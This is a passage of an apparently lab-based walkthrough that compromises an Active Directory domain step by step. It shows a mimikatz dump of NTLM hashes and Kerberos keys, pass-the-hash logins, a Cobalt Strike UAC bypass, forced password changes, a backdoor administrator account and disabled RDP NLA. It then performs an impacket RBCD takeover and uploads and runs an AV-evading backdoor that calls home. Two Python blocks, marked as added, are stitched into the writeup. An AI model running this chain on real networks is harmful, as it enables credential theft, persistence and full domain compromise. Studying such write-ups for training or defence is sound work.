Authentication Id : 0 ; 1484741 (00000000:0016a7c5)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/11/9 2:45:34
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 1483964 (00000000:0016a4bc)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/11/9 2:45:34
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : fpcorp.int
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57 c3 b0 1b e1 e0 9d 5d 8a 06 a1 11 a7 93 08 18 1f 64 3a 40 2e 75 b2 3f ec 47 dd 59 62 e6 95 5d 7a 72 9e 71 36 78 2d 06 63 17 4c 54 e1 99 c2 24 09 6f d0 67 de 45 ac 9d a9 fb 91 bc 82 bb 75 83 52 5a a8 ef 3e 0e af 74 6e 80 ea 6e 6f d4 16 97 7b f2 a2 ce ce c7 08 f2 fc ad cd 84 71 d8 e2 b9 24 bf 42 9d 5f 0c 6a 6b f9 81 34 09 2d 7b 9a 26 16 dc b4 bf 02 96 a3 40 7e 23 ea 0a 13 fb a6 17 b0 14 c2 89 a0 b3 fc 38 8d 25 aa a5 43 18 8b 5d 83 d0 e8 46 cf 4a 76 80 9b c8 d6 ff 7e 13 89 42 78 74 63 5e cb 06 02 9f 28 02 9c 06 bc f9 a2 74 62 70 ad e8 3d d4 38 00 39 85 a9 26 e5 f2 02 2b d4 a0 4b 14 13 e1 06 de d7 91 14 07 c3 0a b5 33 47 c3 09 d4 07 9b 19 12 82 1d 6f 7a 8b ef b0 fa 0e 15 02 9c 14
ssp :
credman :
cloudap :
Authentication Id : 0 ; 321118 (00000000:0004e65e)
Session : Service from 0
User Name : IntraFetch Web Site
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2025/11/9 1:47:33
SID : S-1-5-82-1730752505-4234347734-3256883311-4032060522-3340388024
msv :
[00000003] Primary
* Username : FPSRVIIS03$
* Domain : FPCORP
* NTLM : 539d77a83f4a533d0e1b49c82d896690
* SHA1 : 66f99c38972d25fcf582ddd9e5f8d5c9f7725248
* DPAPI : 66f99c38972d25fcf582ddd9e5f8d5c9
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : FPSRVIIS03$
* Domain : FPCORP.INT
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/11/9 1:44:35
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/11/9 1:44:32
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : FPSRVIIS03$
Domain : FPCORP
Logon Server : (null)
Logon Time : 2025/11/9 1:44:31
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : FPSRVIIS03$
* Domain : FPCORP
* Password : (null)
kerberos :
* Username : fpsrviis03$
* Domain : FPCORP.INT
* Password : (null)
ssp :
credman :
cloudap :
mimikatz(commandline) # exit
Bye!
So the only usable credential is the hash of the current machine account, FPSRVIIS03$:
Username : FPSRVIIS03$
Domain : FPCORP
NTLM : 539d77a83f4a533d0e1b49c82d896690
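The dump above is long because every logon session repeats the same machine-account material. As an added example (not part of the original writeup), this Python parser reads the sekurlsa::logonpasswords layout shown above, collapses the sessions to the distinct msv NTLM entries and lists any cleartext passwords, which is exactly the triage that leads to "only the FPSRVIIS03$ hash is usable". The sample dump, its hashes and the password are constructed placeholders; the function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample in the layout of the sekurlsa::logonpasswords dump above.
# Every hash and password here is a placeholder, not a real credential.
SAMPLE_DUMP = """\
Authentication Id : 0 ; 29050 (00000000:0000717a)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
msv :
[00000003] Primary
* Username : HOST01$
* Domain : CORP
* NTLM : 00000000000000000000000000000001
wdigest :
* Username : HOST01$
* Domain : CORP
* Password : (null)
kerberos :
* Username : HOST01$
* Domain : corp.local
* Password : 62 b2 c3 0d 1e fe de 84 f7 35 33 57
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
msv :
wdigest :
* Username : (null)
* Password : (null)
Authentication Id : 0 ; 321118 (00000000:0004e65e)
Session : Service from 0
User Name : svc_web
Domain : CORP
msv :
[00000003] Primary
* Username : svc_web
* Domain : CORP
* NTLM : 00000000000000000000000000000002
wdigest :
* Username : svc_web
* Domain : CORP
* Password : Winter2025!
"""

SESSION_RE = re.compile(r"Authentication Id\s*:\s*(.+)")
PROVIDER_RE = re.compile(r"^([a-z]+)\s*:\s*$")            # "msv :", "wdigest :", "kerberos :" ...
ITEM_RE = re.compile(r"^\*\s*(\w+)\s*:\s*(.*)$")          # "* NTLM : <hash>"
FIELD_RE = re.compile(r"^(User Name|Domain)\s*:\s*(.*)$")  # session-level fields
HEX_BLOB_RE = re.compile(r"^([0-9a-f]{2}\s+){8,}[0-9a-f]{2}$")  # machine-account key material


def parse_logon_sessions(text):
    """Split a dump into sessions: auth_id, user, domain and per-provider '* key : value' items."""
    sessions, current, provider = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = SESSION_RE.match(line)
        if m:
            current = {"auth_id": m.group(1).strip(), "user": "", "domain": "",
                       "providers": defaultdict(dict)}
            sessions.append(current)
            provider = None
            continue
        if current is None or not line:
            continue
        m = ITEM_RE.match(line)
        if m and provider is not None:
            current["providers"][provider][m.group(1)] = m.group(2).strip()
            continue
        m = PROVIDER_RE.match(line)
        if m:
            provider = m.group(1)
            continue
        m = FIELD_RE.match(line)
        if m:
            current["user" if m.group(1) == "User Name" else "domain"] = m.group(2).strip()
    return sessions


def unique_ntlm(sessions):
    """Collapse repeated sessions to one NTLM hash per DOMAIN\\user, taken from the msv provider."""
    creds = {}
    for s in sessions:
        msv = s["providers"].get("msv", {})
        if msv.get("NTLM") and msv.get("Username") not in (None, "(null)"):
            creds[f"{msv.get('Domain', '?')}\\{msv['Username']}"] = msv["NTLM"].lower()
    return creds


def plaintext_credentials(sessions):
    """(principal, provider, password) for every cleartext password; '(null)' and the hex
    blobs mimikatz prints for machine-account Kerberos keys are skipped."""
    found = []
    for s in sessions:
        for prov, items in s["providers"].items():
            pw = items.get("Password")
            if not pw or pw == "(null)" or HEX_BLOB_RE.match(pw):
                continue
            found.append((f"{items.get('Domain', '?')}\\{items.get('Username', '?')}", prov, pw))
    return found


if __name__ == "__main__":
    sessions = parse_logon_sessions(SAMPLE_DUMP)
    print(f"{len(sessions)} logon sessions")
    for principal, ntlm in unique_ntlm(sessions).items():
        print(f"NTLM  {principal}: {ntlm}")
    for principal, prov, pw in plaintext_credentials(sessions):
        print(f"CLEAR {principal} via {prov}: {pw}")
```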
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# proxychains -q nxc smb 172.22.20.38 -u 'FPSRVIIS03$' -H 539d77a83f4a533d0e1b49c82d896690
SMB 172.22.20.38 445 FPSRVIIS03 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVIIS03) (domain:fpcorp.int) (signing:False) (SMBv1:None)
SMB 172.22.20.38 445 FPSRVIIS03 [+] fpcorp.int\FPSRVIIS03$:539d77a83f4a533d0e1b49c82d896690
Once on the box, information gathering shows that the current user is a member of the local Administrators group, but UAC is enabled, so some high-privilege operations cannot be performed:
[11/10 12:48:27] beacon> shell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
[11/10 12:48:27] [*] Tasked beacon to run: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
[11/10 12:48:27] [+] host called home, sent: 135 bytes
[11/10 12:48:28] [+] received output:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
[11/10 12:48:36] beacon> shell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
[11/10 12:48:36] [*] Tasked beacon to run: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin
[11/10 12:48:36] [+] host called home, sent: 149 bytes
[11/10 12:48:37] [+] received output:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
Here I used a CS BypassUAC plugin directly.
Re-upload the earlier AV-evading payload to a writable directory, pick the BOF variant of the plugin, and after a short wait an administrator-level beacon checks in.
This plugin is someone else's internal tool, so I'm not sharing it for now.
After the bypass succeeds, a beacon running as the local administrator user appears.
With the administrator beacon, use process injection in CS to escalate to SYSTEM.
Then dump plaintext passwords; this yields the plaintext password of liu654:
FPCORP.INT\liu654 p1Uf^yko@+yHS
Verify that it is correct:
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.25 -u 'liu654' -p 'p1Uf^yko@+yHS'
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\liu654:p1Uf^yko@+yHS STATUS_PASSWORD_EXPIRED
The password has expired, so change it:
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.25 -u 'liu654' -p 'p1Uf^yko@+yHS' -M change-password -o NEWPASS=Admin123
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\liu654:p1Uf^yko@+yHS STATUS_PASSWORD_EXPIRED
CHANGE-P... 172.22.20.25 445 FPSRVAD01 [+] Successfully changed password for liu654
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.25 -u 'liu654' -p 'Admin123'
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [+] fpcorp.int\liu654:Admin123
If you want to connect over RDP, just create a local administrator user:
[11/10 13:12:30] beacon> shell whoami
[11/10 13:12:30] [*] Tasked beacon to run: whoami
[11/10 13:12:31] [+] host called home, sent: 37 bytes
[11/10 13:12:31] [+] received output:
fpcorp\wang.17
[11/10 13:12:51] beacon> shell net user c2trus Admin123 /add
[11/10 13:12:51] [*] Tasked beacon to run: net user c2trus Admin123 /add
[11/10 13:12:51] [+] host called home, sent: 61 bytes
[11/10 13:12:51] [+] received output:
命令成功完成。
[11/10 13:13:00] beacon> shell net localgroup administrators c2trus /add
[11/10 13:13:00] [*] Tasked beacon to run: net localgroup administrators c2trus /add
[11/10 13:13:01] [+] host called home, sent: 72 bytes
[11/10 13:13:01] [+] received output:
命令成功完成。
Then connect; at this point a prompt appears.
Run the following command in the CS beacon to disable NLA:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Before you log in, remember to end the current user's RDP session first (wang.17 currently holds an RDP session); if you log in over them and bump them off, the machine reboots. So first end the RDP session from the CS shell, then log in:
shell query session   #list the logged-on sessions
shell logoff <id>   #log off that session
The current user LIU654 has GenericWrite over the FPSRVFS02 computer object, so we can take over that machine via RBCD.
When I reached the domain controller I noticed ADCS is also present in the domain, so Shadow Credentials should work too (not tried).
The target machine exposes an SMB share that our 'FPSRVIIS03$' account has write access to; it is full of so-called confidential documents, but nothing useful.
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# proxychains -q nxc smb 172.22.20.32 -u 'FPSRVIIS03$' -H 539d77a83f4a533d0e1b49c82d896690 --shares
SMB 172.22.20.32 445 FPSRVFS02 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVFS02) (domain:fpcorp.int) (signing:False) (SMBv1:None)
SMB 172.22.20.32 445 FPSRVFS02 [+] fpcorp.int\FPSRVIIS03$:539d77a83f4a533d0e1b49c82d896690
SMB 172.22.20.32 445 FPSRVFS02 [*] Enumerated shares
SMB 172.22.20.32 445 FPSRVFS02 Share Permissions Remark
SMB 172.22.20.32 445 FPSRVFS02 ----- ----------- ------
SMB 172.22.20.32 445 FPSRVFS02 ADMIN$ 远程管理
SMB 172.22.20.32 445 FPSRVFS02 C$ 默认共享
SMB 172.22.20.32 445 FPSRVFS02 filesrv READ,WRITE
SMB 172.22.20.32 445 FPSRVFS02 IPC$ READ 远程 IPC
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# proxychains -q impacket-smbclient 'fpcorp.int/FPSRVIIS03$@172.22.20.32' -hashes :539d77a83f4a533d0e1b49c82d896690
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
filesrv
IPC$
# use filesrv
# ls
drw-rw-rw- 0 Sat Nov 8 14:29:21 2025 .
drw-rw-rw- 0 Thu Jul 3 00:35:32 2025 ..
drw-rw-rw- 0 Thu Jul 3 00:38:32 2025 公司政策_CompanyPolicies
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 各部门_Departments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 培训资料_TrainingMaterials
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 客户文档_ClientDocuments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 用户目录_Users
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 财务报告_FinancialReports
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 软件工具_SoftwareTools
#
For the exploitation steps see: (RBCD) Resource-based constrained | The Hacker Recipes
RBCD
First check whether an ordinary domain user is allowed to create computer accounts:
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc ldap 172.22.20.25 -u 'liu654' -p 'Admin123' -M maq
LDAP 172.22.20.25 389 FPSRVAD01 [*] Windows Server 2022 Build 20348 (name:FPSRVAD01) (domain:fpcorp.int) (signing:None) (channel binding:No TLS cert)
LDAP 172.22.20.25 389 FPSRVAD01 [+] fpcorp.int\liu654:Admin123
MAQ 172.22.20.25 389 FPSRVAD01 [*] Getting the MachineAccountQuota
MAQ 172.22.20.25 389 FPSRVAD01 MachineAccountQuota: 10
This is the default configuration (ordinary domain users may create 10 machine accounts), so RBCD can proceed.
#1. Create a machine account
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q impacket-addcomputer fpcorp.int/liu654:Admin123 -dc-ip 172.22.20.25 -computer-name hack$ -computer-pass Admin23
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account hack$ with password Admin23.
#2. Configure the RBCD permission
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q impacket-rbcd fpcorp.int/liu654:Admin123 -delegate-to FPSRVFS02$ -delegate-from hack$ -dc-ip 172.22.20.25 -action write
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] hack$ can now impersonate users on FPSRVFS02$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] hack$ (S-1-5-21-3225782379-1150096479-4236096888-1179)
#3. Obtain a TGT for the machine account
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q impacket-getTGT fpcorp.int/hack$:Admin23 -dc-ip 172.22.20.25
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in hack$.ccache
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# export KRB5CCNAME=hack\$.ccache
#4. Request a service ticket impersonating Administrator
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q impacket-getST -k -no-pass -spn cifs/FPSRVFS02.fpcorp.int fpcorp.int/hack$ -impersonate Administrator -dc-ip 172.22.20.25
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_FPSRVFS02.fpcorp.int@FPCORP.INT.ccache
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# export KRB5CCNAME=Administrator@cifs_FPSRVFS02.fpcorp.int@FPCORP.INT.ccache
# Verify:
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.32 -u administrator -k --use-kcache
SMB 172.22.20.32 445 FPSRVFS02 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVFS02) (domain:fpcorp.int) (signing:False) (SMBv1:None)
SMB 172.22.20.32 445 FPSRVFS02 [+] fpcorp.int\administrator from ccache (Pwn3d!)
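Steps #2 to #4 work because the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of FPSRVFS02$ now holds a security descriptor whose DACL grants hack$ the right to act on behalf of other identities. As an added example (not from the writeup or from impacket), this Python builds and parses that self-relative SECURITY_DESCRIPTOR so a defender can list exactly which SIDs are allowed to delegate to a computer and compare them with an expected allow-list; the SID is the hack$ SID printed above, the owner SID and access mask are my assumptions about what the tooling writes, and the function names are my own.

```python
import struct

# Assumed descriptor owner (BUILTIN\Administrators) and access mask; both are
# illustrative choices, not values taken from the writeup or from a specific tool.
OWNER_SID = "S-1-5-32-544"
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF


def sid_to_bytes(sid):
    """Encode 'S-1-<authority>-<sub>-...' in the binary SID layout."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"not a SID: {sid}")
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + b"".join(s.to_bytes(4, "little") for s in subs))


def sid_from_bytes(buf, off):
    """Decode a binary SID at buf[off:]; return (sid_string, bytes_consumed)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = [int.from_bytes(buf[off + 8 + 4 * i:off + 12 + 4 * i], "little") for i in range(count)]
    return "-".join(["S", str(rev), str(authority)] + [str(s) for s in subs]), 8 + 4 * count


def build_rbcd_descriptor(sids, mask=FULL_CONTROL):
    """Build the self-relative SECURITY_DESCRIPTOR (header, owner SID, DACL) that
    msDS-AllowedToActOnBehalfOfOtherIdentity stores, with one ACCESS_ALLOWED ACE per SID."""
    aces = b"".join(struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sb), mask) + sb
                    for sb in map(sid_to_bytes, sids))
    # ACL header: revision, sbz1, size, ACE count, sbz2
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces
    owner = sid_to_bytes(OWNER_SID)
    # 20-byte header: revision, sbz1, control, then offsets of owner, group, SACL, DACL
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         20, 0, 0, 20 + len(owner))
    return header + owner + acl


def parse_rbcd_descriptor(blob):
    """Return [(sid, access_mask)] for every ACCESS_ALLOWED ACE in the descriptor's DACL.

    An empty attribute (what impacket-rbcd reported before the write above) or a
    descriptor without a DACL means nobody may delegate, so [] is returned."""
    if not blob:
        return []
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", blob, 0)
    if rev != 1:
        raise ValueError("unsupported security descriptor revision")
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, off_dacl)
    pos, entries = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask = struct.unpack_from("<I", blob, pos + 4)[0]
            sid, _ = sid_from_bytes(blob, pos + 8)
            entries.append((sid, mask))
        pos += ace_size  # other ACE types (object ACEs etc.) have another layout; skip by size
    return entries


def audit_rbcd(blob, expected_sids=()):
    """SIDs allowed to act on behalf of the computer that are not on the expected allow-list."""
    expected = set(expected_sids)
    return [sid for sid, _ in parse_rbcd_descriptor(blob) if sid not in expected]


if __name__ == "__main__":
    # SID of hack$ as printed by impacket-rbcd above
    hack_sid = "S-1-5-21-3225782379-1150096479-4236096888-1179"
    blob = build_rbcd_descriptor([hack_sid])
    print("allowed to delegate:", parse_rbcd_descriptor(blob))
    print("not on allow-list:", audit_rbcd(blob))
    print("attribute empty:", audit_rbcd(b""))
```

In a real audit the blob comes from an LDAP read of the attribute on each computer object; any SID that audit_rbcd returns is a delegation right nobody approved.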
Now we can execute commands on FPSRVFS02 over SMB, but I was not able to pass-the-hash onto it directly.
Upload our earlier AV-evading payload to the target's SMB share:
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q impacket-smbclient 'fpcorp.int/FPSRVIIS03$@172.22.20.32' -hashes :ef9128f91d1242e8e9854d265c81b460
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use filesrv
# ls
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 .
drw-rw-rw- 0 Mon Nov 10 02:48:06 2025 ..
drw-rw-rw- 0 Thu Jul 3 00:38:32 2025 公司政策_CompanyPolicies
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 各部门_Departments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 培训资料_TrainingMaterials
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 客户文档_ClientDocuments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 用户目录_Users
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 财务报告_FinancialReports
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 软件工具_SoftwareTools
# put shell.exe
# dir
*** Unknown syntax: dir
# ls
drw-rw-rw- 0 Mon Nov 10 02:53:07 2025 .
drw-rw-rw- 0 Mon Nov 10 02:48:06 2025 ..
-rw-rw-rw- 1713152 Mon Nov 10 02:53:07 2025 shell.exe
drw-rw-rw- 0 Thu Jul 3 00:38:32 2025 公司政策_CompanyPolicies
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 各部门_Departments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 培训资料_TrainingMaterials
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 客户文档_ClientDocuments
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 用户目录_Users
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 财务报告_FinancialReports
drw-rw-rw- 0 Thu Jul 3 00:39:34 2025 软件工具_SoftwareTools
#
Then find which directory on the target server backs this SMB share:
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.32 -u administrator -k --use-kcache -x 'dir c:\Filesrv' --codec gbk
SMB 172.22.20.32 445 FPSRVFS02 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVFS02) (domain:fpcorp.int) (signing:False) (SMBv1:None)
SMB 172.22.20.32 445 FPSRVFS02 [+] fpcorp.int\administrator from ccache (Pwn3d!)
SMB 172.22.20.32 445 FPSRVFS02 [+] Executed command via wmiexec
SMB 172.22.20.32 445 FPSRVFS02 驱动器 C 中的卷没有标签。
SMB 172.22.20.32 445 FPSRVFS02 卷的序列号是 5661-41C3
SMB 172.22.20.32 445 FPSRVFS02 c:\Filesrv 的目录
SMB 172.22.20.32 445 FPSRVFS02 2025/11/10 15:53 <DIR> .
SMB 172.22.20.32 445 FPSRVFS02 2025/11/10 15:53 1,713,152 shell.exe
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 11:59 <DIR> 公司政策_CompanyPolicies
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:27 <DIR> 各部门_Departments
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:29 <DIR> 培训资料_TrainingMaterials
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:29 <DIR> 客户文档_ClientDocuments
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:29 <DIR> 用户目录_Users
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:29 <DIR> 财务报告_FinancialReports
SMB 172.22.20.32 445 FPSRVFS02 2025/07/03 12:29 <DIR> 软件工具_SoftwareTools
SMB 172.22.20.32 445 FPSRVFS02 1 个文件 1,713,152 字节
SMB 172.22.20.32 445 FPSRVFS02 8 个目录 8,007,426,048 可用字节
It lives under c:\Filesrv; run the backdoor and wait for it to check in:
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.32 -u administrator -k --use-kcache -x 'c:\Filesrv\shell.exe'
SMB 172.22.20.32 445 FPSRVFS02 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVFS02) (domain:fpcorp.int) (signing:False) (SMBv1:None)
SMB 172.22.20.32 445 FPSRVFS02 [+] fpcorp.int\administrator from ccache (Pwn3d!)
SMB 172.22.20.32 445 FPSRVFS02 [+] Executed command via wmiexec
After it checks in: this machine has a HasSession edge to svc_bkpadmin, which means credentials left behind by svc_bkpadmin can be dumped on it.
Here the plaintext password and hash of svc_bkpadmin were dumped successfully.
Verifying them shows that this password has expired as well; just change it:
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.25 -u svc_bkpadmin -H f2f3e075ca082813f0d8191f947b0e01
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\svc_bkpadmin:f2f3e075ca082813f0d8191f947b0e01 STATUS_PASSWORD_EXPIRED
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# proxychains -q nxc smb 172.22.20.25 -u svc_bkpadmin -H f2f3e075ca082813f0d8191f947b0e01 -M change-password -o NEWPASS=Admin123
SMB 172.22.20.25 445 FPSRVAD01 [*] Windows Server 2022 Build 20348 x64 (name:FPSRVAD01) (domain:fpcorp.int) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.20.25 445 FPSRVAD01 [-] fpcorp.int\svc_bkpadmin:f2f3e075ca082813f0d8191f947b0e01 STATUS_PASSWORD_EXPIRED
CHANGE-P... 172.22.20.25 445 FPSRVAD01 [+] Successfully changed password for svc_bkpadmin
With the svc_bkpadmin credentials, log in to the domain controller directly over WinRM:
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
